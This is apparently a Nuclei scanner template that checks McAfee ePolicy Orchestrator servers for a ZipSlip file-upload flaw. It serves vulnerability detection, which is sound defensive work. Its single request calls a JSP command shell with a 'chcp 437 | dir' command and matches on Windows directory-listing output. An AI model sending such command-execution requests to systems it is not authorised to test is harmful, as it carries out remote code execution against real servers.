2020-12-09 08:33:35 +00:00
id : mcafee-epo-rce
info :
2022-07-27 20:17:31 +00:00
name : McAfee ePolicy Orchestrator - Arbitrary File Upload
2020-12-09 08:33:35 +00:00
author : dwisiswant0
severity : high
description : |
2022-07-27 20:17:31 +00:00
McAfee ePolicy Orchestrator (ePO) is vulnerable to a ZipSlip vulnerability which allows arbitrary file upload when archives are unpacked if the names of the packed files are not properly sanitized. An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction.
2021-08-18 11:37:49 +00:00
reference :
2020-12-09 08:33:35 +00:00
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2024-01-14 09:21:50 +00:00
tags : mcafee,rce
2020-12-09 08:33:35 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-12-09 08:33:35 +00:00
- method : GET
path :
- "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir"
2023-10-14 11:27:55 +00:00
2020-12-09 08:33:35 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
2023-10-14 11:27:55 +00:00
2020-12-09 08:33:35 +00:00
- type : word
words :
- "text/html"
part : header
2023-10-14 11:27:55 +00:00
2020-12-09 08:33:35 +00:00
- type : regex
regex :
- "Volume (in drive [A-Z]|Serial Number) is"
2022-07-27 20:17:31 +00:00
part : body
2024-01-26 08:31:11 +00:00
# digest: 4b0a00483046022100b2803bf3e2af2d31330e8aea3dc1c0e1d81017090aaaec3c762903720b17597a022100ee07d286019b44c10df226e675426d89a3334cd5906ddf91b6fa9f6a6ad1a8fc:922c64590222798bb761d5b6d8e72950
